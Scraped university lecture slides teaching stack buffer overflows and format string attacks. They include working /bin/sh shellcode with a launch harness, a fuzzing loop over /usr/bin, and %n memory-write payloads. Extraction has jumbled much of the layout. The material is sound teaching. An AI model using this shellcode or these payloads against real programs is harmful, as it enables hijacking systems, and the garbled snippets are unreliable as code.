Exploits - Carnegie Mellon University

Exploits - Carnegie Mellon University

Exploits Buffer Overflows and Format String Attacks David Brumley [email protected] Carnegie Mellon University You will find at least one error on each set of slides. :) 2 Exploits Bug format c: White Black 3 OK $ iwconfig accesspoint Exploit

$ iwconfig01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 50c0 2f68 # 622f 6e69 Superuser e189 d231 0101 0101 0101 0101 bfff 0101 0101 0101 3101 6868 5350 80cd

0101 0101 0101 0101 fce8 0101 0101 0101 0101 732f e389 0bb0 4 Fact: Ubuntu Linux has over 99,000 known bugs 5 1. inp=`perl e '{print "A"x8000}'` 2. for program in /usr/bin/*; do 3. for opt in {a..z} {A..Z};

do 4. timeout s 9 1s $program -$opt $inp 5. done 6.1009 doneLinux programs. 13 minutes. 52 new bugs in 29 programs. 6 Which bugs are exploitable? Evil David Today, Today, we we are are going going to to learn learn how how to to tell. tell.

7 Bugs and Exploits A bug is a place where real execution behavior may deviate from expected behavior. An exploit is an input that gives an attacker an advantage Method Control Flow Hijack Denial of Service Information Disclosure Objective Gain control of the instruction pointer %eip Cause program to crash or stop servicing clients Leak private information, e.g., saved password 8 Agenda 1. Control Flow Hijacks 2. Common Hijacking Methods Buffer Overflows Format String Attacks 3. Whats new

9 Control Flow Recap 10 Basic Execution Fetch, decode, execute Binary Code Data ... Processor Stack Heap File system read and write Process Memory 11 cdecl the default for Linux & gcc

after red has been called b a return addr callers ebp callee-save locals (buf, c, d 28 bytes if stored on stack) caller-save %ebp frame %esp stack buf c return addr grow grow

int orange(int a, int b) parameter { area (caller) char buf[16]; int c, d; oranges initial if(a > b) stack c = a; frame else c = b; to be created d = red(c, buf); before return d; calling red } oranges ebp 12

Control Flow Hijack: Always Computation + Control shellcode (aka payload) computation code injection return-to-libc Heap metadata overwrite return-oriented programming ... padding + &buf control Same principle, different mechanism 13

Buffer Overflows Assigned Reading: Smashing the stack for fun and profit by Aleph One 14 What are Buffer Overflows? A buffer overflow occurs when data is written outside of the space allocated for the buffer. C does not check that writes are in-bound 1. Stack-based covered in this class 2. Heap-based more advanced very dependent on system and library version 15 Basic Example #include int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); }

argv argc return addr Dump of assembler code for function main: callers ebp 0x080483e4 <+0>: push %ebp buf 0x080483e5 <+1>: mov %esp,%ebp (64 bytes) 0x080483e7 <+3>: sub $72,%esp 0x080483ea <+6>: mov 12(%ebp),%eax 0x080483ed <+9>: mov 4(%eax),%eax 0x080483f0 <+12>: mov %eax,4(%esp) 0x080483f4 <+16>: lea -64(%ebp),%eax

0x080483f7 <+19>: mov %eax,(%esp) 0x080483fa <+22>: call 0x8048300 argv[1] 0x080483ff <+27>: leave buf 0x08048400 <+28>: ret %ebp %esp 16 123456 #include int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } argv argc %ebp 123456\0

Dump of assembler code for function main: 0x080483e4 <+0>: push %ebp 0x080483e5 <+1>: mov %esp,%ebp 0x080483e7 <+3>: sub $72,%esp 0x080483ea <+6>: mov 12(%ebp),%eax 0x080483ed <+9>: mov 4(%eax),%eax 0x080483f0 <+12>: mov %eax,4(%esp) 0x080483f4 <+16>: lea -64(%ebp),%eax 0x080483f7 <+19>: mov %eax,(%esp) 0x080483fa <+22>: call 0x8048300 0x080483ff <+27>: leave 0x08048400 <+28>: ret

return addr return addr callers ebp callers ebp buf (64 bytes) argv[1] buf %esp 17 Ax68 . \xEF\xBE\xAD\xDE #include int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } argv argc corrupted 0x080483ea 0x080483ed

0x080483f0 0x080483f4 0x080483f7 0x080483fa 0x080483ff 0x08048400 <+6>: <+9>: <+12>: <+16>: <+19>: <+22>: <+27>: <+28>: mov mov mov lea mov call leave ret AAAA (64 in total) overwritten return addr

0xDEADBEE Dump of assembler code for function main: overwritten callers F ebp 0x080483e4 <+0>: push %ebp buf AAAA 0x080483e5 <+1>: mov %esp,%ebp (64 bytes) 0x080483e7 <+3>: sub $72,%esp 12(%ebp),%eax 4(%eax),%eax %eax,4(%esp) -64(%ebp),%eax %eax,(%esp) 0x8048300 %ebp argv[1] buf

%esp 18 Frame teardown1 #include int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } argv corrupted argc overwritten 0xDEADBEE Dump of assembler code for function main: F overwritten 0x080483e4 <+0>: push %ebp AAAA 0x080483e5 0x080483e7 0x080483ea 0x080483ed

0x080483f0 0x080483f4 0x080483f7 0x080483fa => 0x080483ff 0x08048400 <+1>: <+3>: <+6>: <+9>: <+12>: <+16>: <+19>: <+22>: <+27>: <+28>: mov sub mov mov mov lea mov call leave ret

%esp,%ebp $72,%esp leave leave 12(%ebp),%eax 1. 4(%eax),%eax 1. mov mov %eax,4(%esp) 2. 2. pop pop -64(%ebp),%eax %eax,(%esp) 0x8048300 %esp and %ebp %ebp,%esp %ebp,%esp %ebp %ebp %esp

19 Frame teardown2 #include int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } argv corrupted argc overwritten 0xDEADBEE F Dump of assembler code for function main: 0x080483e4 0x080483e5 0x080483e7 0x080483ea 0x080483ed 0x080483f0 0x080483f4 0x080483f7 0x080483fa 0x080483ff

0x08048400 <+0>: <+1>: <+3>: <+6>: <+9>: <+12>: <+16>: <+19>: <+22>: <+27>: <+28>: push mov sub mov mov mov lea mov call leave ret %esp

%ebp %ebp %ebp = = AAAA AAAA %esp,%ebp $72,%esp leave leave 12(%ebp),%eax 1. 4(%eax),%eax 1. mov mov %ebp,%esp %ebp,%esp %eax,4(%esp) 2. 2. pop pop %ebp %ebp -64(%ebp),%eax %eax,(%esp) 0x8048300 20 Frame teardown3 #include

int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } argv corrupted argc %esp Dump of assembler code for function main: 0x080483e4 <+0>: push %ebp 0x080483e5 <+1>: mov %esp,%ebp 0x080483e7 <+3>: sub $72,%esp %eip %eip = = 0xDEADBEEF 0xDEADBEEF 0x080483ea <+6>:

mov 12(%ebp),%eax (probably 0x080483ed <+9>: mov 4(%eax),%eax (probably crash) crash) 0x080483f0 <+12>: mov %eax,4(%esp) 0x080483f4 <+16>: lea -64(%ebp),%eax 0x080483f7 <+19>: mov %eax,(%esp) 0x080483fa <+22>: call 0x8048300 0x080483ff <+27>: leave 0x08048400 <+28>: ret 21 Shellcode Traditionally, we inject assembly instructions for exec(/bin/sh) into buffer. argv argc

&buf 0x080483fa <+22>: 0x080483ff <+27>: 0x08048400 <+28>: call leave ret %ebp shellcode see Smashing the stack for fun and profit for exact string or search online 0x8048300 argv[1] buf %esp 22

Executing system calls 1. 2. 3. 4. execve(/bin/sh, 0, 0); Put syscall number in eax Set up arg 1 in ebx, arg 2 in ecx, arg 3 in edx Call int 0x80* System call runs. Result in eax * using sysenter is faster, but this is the traditional explanation execve is 0xb addr. in ebx, 0 in ecx 23 Shellcode example xor ecx, ecx mul ecx push ecx push 0x68732f2f

push 0x6e69622f mov ebx, esp mov al, 0xb int 0x80 Notice no NULL chars. Why? "\x31\xc9\xf7\xe1\x51\x68\x2f\ x2f "\x73\x68\x68\x2f\x62\x69\x6e\ x89 "\xe3\xb0\x0b\xcd\x80; Executable String Shellcode Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php 24 Program Example #include #include char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\xb0\x0b\xcd\x80"; int main(int argc, char **argv) {

printf ("Shellcode length : %d bytes\n", strlen (code)); int(*f)()=(int(*)())code; f(); } $$ gcc gcc -o -o shellcode shellcode -fno-stack-protector -fno-stack-protector -z -z execstack execstack shellcode.c shellcode.c Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php 25 Execution xor ecx, ecx mul ecx push ecx push 0x68732f2f push 0x6e69622f mov ebx, esp mov al, 0xb int 0x80 Shellcode

ebx ecx eax esp 0 0x0b Registers esp 0x0 0x68 0x0 h 0x73 0x2f 0x2f s / / 0x6e 0x69

0x62 0x2f n i b / Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php 26 Tips Factors affecting the stack frame: statically declared buffers may be padded what about space for callee-save regs? [advanced] what if some vars are in regs only? [advanced] what if compiler reorder local variables on stack? argv argc

return addr callers ebp buf %ebp gdb is your friend! (google gdb quick reference) Dont just brute force or guess offsets. Think! argv[1] buf %esp 27 nop slides WARNING: Environment changes address of buf $ OLDPWD= ./vuln vs. $ OLDPWD=aaaa ./vuln env

argv Overwrite nop with any position in nop slide ok return addr callers ebp buf execve nop slide Protip: Inserting nops (e.g., 0x90) into shellcode allow for slack argc 0x90 ... 0x90 argv[1] buf 28 Recap To generate exploit for a basic buffer overflow:

1. Determine size of stack frame up to head of buffer 2. Overflow buffer with the right size shellcode computation padding + &buf control 29 Format String Attacks Assigned Reading: Exploiting Format String Vulnerabilities by scut / Team Teso 30 If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present. scut/team teso 31 Channeling Vulnerabilities

... arise when control and data are mixed into one channel. Situation Data Channel Control Channel Security Format Strings Output string Format parameters Disclose or write to memory malloc buffers malloc data Heap metadata info Control

hijack/write to memory Stack Stack data Return address Control hijack Phreaking Voice or data Operator tones Seize line control 32 Dont abuse printf Wrong OK int wrong(char *user) {

printf(user); } int ok(char *user) { printf(%s, user); } Alternatives: fputs(user, stdout) puts(user) //newline 33 Agenda 1. How format strings, and more generally variadic functions, are implemented 2. How to exploit format string vulnerabilities 34 Format String Functions printf(char *fmt, ...) Specifies number and types of arguments Variable number of arguments

Function Purpose printf prints to stdout fprintf prints to a FILE stream sprintf prints to a string vfprintf prints to a FILE stream from va_list syslog writes a message to the system log setproctitle sets argv[0]

35 Variadic Functions are functions of indefinite arity. Widely supported in languages: C C++ Javascript In cdecl, caller is responsible Perl to clean up the arguments. Can you guess why? PHP ... 36 Assembly View For non-variadic functions, the compiler: knows number and types of arguments emits instructions for caller to push arguments right to left emits instructions for callee to access arguments via frame pointer (or stack pointer [advanced]) For variadic functions, the compiler emits instructions for the program to walk the stack at runtime for arguments

37 Simple Example Suppose we want to implement a printf-like function that only prints when a debug key is set: void debug(char *key, char *fmt, ...) { va_list ap; char buf[BUFSIZE]; Set up ap to point to stack using last fixed argument if (!KeyInList(key)) return; va_start(ap, fmt); vsprintf(buf, fmt, ap); va_end(ap); printf(%s, buf); } argument pointer ap Call vsprintf with args Cleanup 38 Stack Diagram caller

arg n arg 2 arg 1 return addr callers ebp callee callee-save locals n-1th specified argument 1st specified argument (va_list) format specifier Think of va_list as a pointer to the second argument (first after format) Each format specifier

indicates type of current arg Know how far to increment pointer for next arg 39 Example caller arg 4 arg 3 arg 2 42 address of world arg 1 return addr callers ebp printf callee-save locals

address of hello address of %s %s %u char s1[] = hello; char s2[] = world; printf(%s %s %u, s1, s2, 42); 40 Conversion Specifications %[flag][width][.precision][length]specifier Specifier Output Passed as %d decimal (int) value

%u unsigned decimal (unsigned int) value %x hexadecimal (unsigned int) %s string (const unsigned char *) reference %n # of bytes written so far (int *) reference 0 flag: zero-pad %08x

zero-padded 8-digit hexadecimal number man -s 3 printf Minimum Width value %3s pad with up to 3 spaces printf(S:%3s, 1); S: 1 printf(S:%3s, 12); S: 12 printf(S:%3s, 123); S:123 printf(S:%3s, 1234); S:1234 41 Agenda 1. How format strings, and more generally variadic functions, are implemented 2. How to exploit format string vulnerabilities a. Viewing memory b. Overwriting memory 42

1. 2. 3. 4. 5. int foo(char *fmt) { char buf[32]; strcpy(buf, fmt); printf(buf); } 080483d4 : 80483d4: push 80483d5: mov 80483d7: sub 80483da: mov 80483dd: mov 80483e1: lea 80483e4: mov 80483e7: call 80483ec: lea 80483ef: mov 80483f2: call 80483f7: leave 80483f8: ret %ebp

%esp,%ebp $0x28,%esp ; allocate 40 bytes on stack 0x8(%ebp),%eax ; eax := M[ebp+8] - addr of %eax,0x4(%esp) ; M[esp+4] := eax - push as -0x20(%ebp),%eax ; eax := ebp-32 - addr of %eax,(%esp) ; M[esp] := eax - push as 80482fc -0x20(%ebp),%eax ; eax := ebp-32 - addr of %eax,(%esp) ; M[esp] := eax - push as 804830c fmt arg 2 buf arg 1 buf again arg 1 43

Stack Diagram @ printf return addr foo callers ebp buf (32 bytes) stale arg 2 1. int foo(char *fmt) { 2. char buf[32]; 3. strcpy(buf, fmt); => printf(buf); 5. } addr of fmt arg 1 printf

return addr addr of buf foos ebp locals 44 Viewing Stack return addr 1. int foo(char *fmt) { 2. char buf[32]; 3. strcpy(buf, fmt); => printf(buf); 5. } foo callers ebp buf

(32 bytes) stale arg 2 arg 1 printf return addr foos ebp locals fmt buf What are the effects if fmt is: 1. %s 2. %s%c 3. %x%x...%x 11 times 45 Viewing Specific Address1 return addr foo callers ebp

buf (32 bytes) stale arg 2 arg 1 printf return addr foos ebp locals 1. int foo(char *fmt) { 2. char buf[32]; 3. strcpy(buf, fmt); => printf(buf); 5. } Observe: buf is below printf on the call stack, thus we can walk to it with the correct specifiers. What if fmt is %x%s? 46

Viewing Specific Address2 return addr foo callers ebp (bufs other 28 bytes) 0xbffff747 stale arg 2 arg 1 printf return addr foos ebp locals 1. int foo(char *fmt) { 2. char buf[32]; 3. strcpy(buf, fmt);

=> printf(buf); 5. } Idea! Encode address to peek in buf first. Address 0xbffff747 is \x47\xf7\xff\xbf in little endian. \x47\xf7\xff\xbf%x%s 47 Control Flow Hijack Overwrite return address with bufferoverflow induced by format string Writing any value to any address directly 1. %n format specifier for writing 2. writing (some value) to a specific address 3. controlling the written value 48 Specifying Length What does: int a; printf(-%10u-%n", 7350, &a); print?

Print argument padded to 10 digits - 7350- 6 4 spaces digits 49 Overflow by Format String return addr foo callers ebp buf (32 bytes) arg 2 char buf[32]; sprintf(buf, user); Overwrite return address

%36u\x3c\xd3\xff\bf arg 1 sprintf return addr foos ebp locals Write 36 digit decimal, overwriting buf and callers ebp Shellcode with nop slide 50 %n Format Specifier %n writes the number of bytes printed so far to an integer specified by its address int i; printf(abcde%n\n, (int *) &i); printf(i = %d\n, i); Output:

abcde i = 5 51 Writing to Specific Address Encode address in format string: "\xc0\xc8\xff\xbf_%08x .%08x.%n" pop dwords from stack to reach format string Writes a small num at destination 0xbfffc8c0 Can use four carefully-controlled writes to create an address at destination 52 Writing Arbitrary Values Suppose we want to write 0x10203040. (e.g., for GOT attack in next lecture) 53 Writing Arbitrary Values

unsigned char canary[5]; unsigned char foo[4]; memset (foo, \x00, sizeof (foo)); 0. strcpy (canary, "AAAA"); 1. printf ("%16u%n", 7350, (int *) &foo[0]); 2. printf ("%32u%n", 7350, (int *) &foo[1]); 3. printf ("%64u%n", 7350, (int *) &foo[2]); 4. printf ("%128u%n", 7350, (int *) &foo[3]); 0x00 0x41 0x41 canary 0x41 0x41 0x00 0x00 0x00 foo 0x00 * taken directly from reading 54

Writing Arbitrary Values unsigned char canary[5]; unsigned char foo[4]; memset (foo, \x00, sizeof (foo)); 0. strcpy (canary, "AAAA"); 1. printf ("%16u%n", 7350, (int *) &foo[0]); 2. printf ("%32u%n", 7350, (int *) &foo[1]); 3. printf ("%64u%n", 7350, (int *) &foo[2]); 4. printf ("%128u%n", 7350, (int *) &foo[3]); 0x00 0x41 0x41 canary 0x41 0x41 0x00 0x00 0x00 foo 0x10

* taken directly from reading 55 Writing Arbitrary Values unsigned char canary[5]; unsigned char foo[4]; memset (foo, \x00, sizeof (foo)); 0. strcpy (canary, "AAAA"); 1. printf ("%16u%n", 7350, (int *) &foo[0]); 2. printf ("%32u%n", 7350, (int *) &foo[1]); 3. printf ("%64u%n", 7350, (int *) &foo[2]); 4. printf ("%128u%n", 7350, (int *) &foo[3]); 0x00 0x41 0x41 canary 0x41 0x00 0x00 0x00 0x20

foo 0x10 * taken directly from reading 56 Writing Arbitrary Values unsigned char canary[5]; unsigned char foo[4]; memset (foo, \x00, sizeof (foo)); 0. strcpy (canary, "AAAA"); 1. printf ("%16u%n", 7350, (int *) &foo[0]); 2. printf ("%32u%n", 7350, (int *) &foo[1]); 3. printf ("%64u%n", 7350, (int *) &foo[2]); 4. printf ("%128u%n", 7350, (int *) &foo[3]); 0x00 0x41 0x41 canary 0x00

0x00 0x00 0x40 0x20 foo 0x10 * taken directly from reading 57 Writing Arbitrary Values unsigned char canary[5]; unsigned char foo[4]; memset (foo, \x00, sizeof (foo)); 0. strcpy (canary, "AAAA"); 1. printf ("%16u%n", 7350, (int *) &foo[0]); 2. printf ("%32u%n", 7350, (int *) &foo[1]); 3. printf ("%64u%n", 7350, (int *) &foo[2]); 4. printf ("%128u%n", 7350, (int *) &foo[3]); 0x00 0x41 0x00

canary 0x00 0x00 0x80 0x40 0x20 foo 0x10 * taken directly from reading 58 All in one write printf ("%16u%n%16u%n%32u%n%64u%n", 1, (int *) &foo[0], 1, (int *) &foo[1], 1, (int *) &foo[2], 1, (int *) &foo[3]); Each %n writes 4 bytes, but that doesnt matter only last byte written is used in the address since we incrementally write each byte of the destination See assigned reading for writing an arbitrary 4-byte

value to an arbitrary 4-byte destination 59 Practical gdb Tips Addresses inside gdb may be different than on command line gdb has a slightly different environment Before submitting assignment, make sure you are using the real addresses. You can use %08x.%08x. from command line to find real addresses Use set args `perl e print \x51\xf7\xff\xbf` to get addresses into gdb. I dont know of an easier way. Learn gdb gdb cheat sheet on website. Most important: break-points, ni (next-instruction), s (next statement), x / (inspect memory), and p / (print variable) 60 Recap Use spurious format specifiers to walk the stack until format string is reached Zero and width, e.g., %08x Use format string buffer itself to encode addresses Two ways to overwrite ret address:

Use %n sprintf for basic buffer overflow. 61 Whats new since 1996? Assigned Reading: Smashing the stack in 2011 by Paul Makowski 62 A lot has happened Heap-based buffer overflows also common [not mentioned] fortified source by static analysis (e.g., gcc can sometimes replace strcpy by strcpy_chk) Future Lectures: Canary (e.g. ProPolice in gcc) Data Execution Protection/No eXecute Address Space Layout Randomization alias alias gcc732='gcc gcc732='gcc -m32 -m32 -g3 -g3 -O1 -O1 -fverbose-asm -fverbose-asm -fno-omit-frame-fno-omit-framepointer

pointer -mpreferred-stack-boundary=2 -mpreferred-stack-boundary=2 -fno-stack-protector -fno-stack-protector -fno-pie -fno-pie -fno-PIC fno-PIC -D_FORTIFY_SOURCE=0' -D_FORTIFY_SOURCE=0' 63 But little has changed Method to gain entry remains the same buffer overflows format strings Whats different is shellcode: 64 END

Recently Viewed Presentations

  • Improving Stream Flow Estimates in NHDPlus

    Improving Stream Flow Estimates in NHDPlus

    Tim Bondelid- NHDPlus Team. Consulting Engineer. 2012 ESRI International User Conference . July 23-27, 2012. San Diego, CA. NHD Plus ... Water-quality modeling (SPARROW) Regional and national stream flow assessments goal of National Stream Flow Information Program.
  • PPT for Adult Education Directors Receiving a Program Quality ...

    PPT for Adult Education Directors Receiving a Program Quality ...

    Review Indicators of Program Quality 3, 4, 7 and 8 with program staff participating in the review. Ensure program staff know the Program Quality Review Protocol. Identify and prepare a group of 8-10 students representative of all program levels for...
  • Introduction to Sheltered Instruction Observation Protocol

    Introduction to Sheltered Instruction Observation Protocol

    Goals. By 2020, 90% of 3rd-grade students will read on or above grade level. By 2018, our graduation rate will be 90%. By 2018, we will close the achievement gap between subgroups by 10 percentage points while increasing the performance...
  • Introduzione alla Traduzione - DidatticaWEB

    Introduzione alla Traduzione - DidatticaWEB

    FIELD what is being written about. TENOR who is communicating, and to whom. MODE the form of communication. Each of these is associated with a . METAFUNCTION, or "strand of meaning": FIELD - ideational. TENOR - interpersonal. MODE - textual
  • Routing - brahm.staff.gunadarma.ac.id

    Routing - brahm.staff.gunadarma.ac.id

    Pengantar Jaringan Komputer Pengantar Jaringan Komputer Bridges Digunakan sebagai pembagi segment dalam LAN. Bekerja menggunakan table bridge yang berisikan port dan MAC address (Nomor ID NIC) Bridge belajar ttg device yang terkoneksi ke portnya untuk menentukan apakah suatu traffic perlu...
  • Data backup, security, storage & preservation GEO 802,

    Data backup, security, storage & preservation GEO 802,

    Convert text files from .doc or .xls to .txt, image files to .tiff or .pdf. Be sure to check files after converting them, as data, metadata, and formatting loss can occur. Versioning. Use consecutive numbers and letters to help keep...
  • 7. RAAMPROGRAMM Tervis Ideed ERC Toit Teadlaste esialgne

    7. RAAMPROGRAMM Tervis Ideed ERC Toit Teadlaste esialgne

    Gender and research 5.2.1 Place of S&T in society 5.1.1 FP7-SCIENCE-IN-SOCIETY-2013-1 Vastutustundliku teadustegevuse ja innovatsiooni protsessi (RRI) kriteeriumite väljatöötamine ja rakendamine: Responsible Research and Innovation (RRI) Training and Dissemination toolkit (CSA, 7M€, 1 taotlus) Loodavad materjalid ja kõigis EU liikmes-...
  • Earth Science - Weebly

    Earth Science - Weebly

    Submarine fan. Barrier island. Deep marine. Depositional Environments. Three options. Compaction. Cementation. Both compaction and cementation together. Compaction: the process of reducing the volume of the material…pore spaces are reduced, then eliminated, can have notable adhesion depending ...